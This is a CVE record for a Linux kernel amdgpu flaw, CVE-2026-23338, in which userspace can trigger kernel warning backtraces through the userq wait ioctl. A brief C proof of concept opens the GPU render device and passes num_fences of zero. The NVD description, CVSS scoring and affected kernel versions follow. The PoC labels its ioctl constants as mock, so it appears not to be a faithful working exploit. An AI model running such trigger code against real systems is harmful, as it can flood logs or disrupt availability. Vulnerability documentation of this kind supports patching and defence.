CVE-2026-23338

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Mock definitions for PoC demonstration #define DRM_IOCTL_AMDGPU_USERQ_WAIT 0x40 #define AMDGPU_GEM_DOMAIN_GTT 0x2 struct drm_amdgpu_userq_wait { __u32 num_fences; // Vulnerable parameter __u32 pad; __u64 fences; }; int main() { int fd = open("/dev/dri/renderD128", O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } struct drm_amdgpu_userq_wait args; // Trigger the warning by passing a deliberately small num_fences args.num_fences = 0; args.fences = 0; printf("Attempting to trigger kernel warning via ioctl...\n"); // This call is expected to fail with errno but may trigger WARN_ON in vulnerable kernels int ret = ioctl(fd, DRM_IOCTL_AMDGPU_USERQ_WAIT, &args); if (ret < 0) { perror("Ioctl failed (expected)"); printf("Check dmesg for potential kernel warnings/backtrace.\n"); } else { printf("Ioctl succeeded unexpectedly.\n"); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23338", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:31.537", "lastModified": "2026-04-23T21:17:25.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/userq: Do not allow userspace to trivially triger kernel warnings\n\nUserspace can either deliberately pass in the too small num_fences, or the\nrequired number can legitimately grow between the two calls to the userq\nwait ioctl. In both cases we do not want the emit the kernel warning\nbacktrace since nothing is wrong with the kernel and userspace will simply\nget an errno reported back. So lets simply drop the WARN_ONs.\n\n(cherry picked from commit 2c333ea579de6cc20ea7bc50e9595ef72863e65c)"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/amdgpu/userq: No permitir que el espacio de usuario active trivialmente advertencias del kernel\n\nEl espacio de usuario puede pasar deliberadamente un num_fences demasiado pequeño, o el número requerido puede crecer legítimamente entre las dos llamadas al ioctl de espera de userq. En ambos casos no queremos emitir el rastreo de advertencia del kernel, ya que no hay ningún problema con el kernel y el espacio de usuario simplemente recibirá un errno informado. Así que simplemente descartemos los WARN_ON.\n\n(extraído del commit 2c333ea579de6cc20ea7bc50e9595ef72863e65c)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16.1", "versionEndExcluding": "6.18.17", "matchCriteriaId": "5B092616-17E9-4C58-A0D5-624A8FAE8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:*", "matchCriteriaId": "6238B17D-C12B-458F-A138-97039BFC4595"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1753f5f81ab60a553287f9ee659a6ac363adf8d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7321302edca3a349ddaea689df95b986beee6c4a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7b7d7693a55d606d700beb9549c9f7f0e5d9c24f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}